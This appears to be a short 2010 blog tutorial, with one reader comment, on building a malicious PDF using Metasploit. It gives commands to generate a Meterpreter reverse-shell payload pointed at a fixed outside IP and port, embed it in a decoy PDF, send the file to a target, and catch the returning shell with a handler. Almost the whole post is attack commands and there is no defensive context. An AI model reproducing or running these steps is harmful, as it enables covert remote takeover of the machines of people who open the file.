Thursday, May 13, 2010

Client-side Attack by Using Evil PDF

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe


Step 2: Create an evil pdf

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/metepreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit

Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory

Result: /tmp/BestComputerGuide.pdf

Step 3: Send the evil pdf file to your client

Step 4: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Posted by at

1 comment:

  1. Amit palDecember 26, 2013 at 7:43 AM

    Thanks for this post but i have some doubt:
    What is the use of set EXENAME in BestComputerGuid.pdf here?
    If someone open BestComputerGuid.pdf then it would execute "payload.exe "?
    Correct me here if i am wrong:
    Click on BestComputerGuid.pdf -> It will ask to save "Report.pdf" -> After saving it when i open "Report.pdf" nothing will happen. how to execute paylod.exe?

    ReplyDelete

Subscribe to: Post Comments (Atom)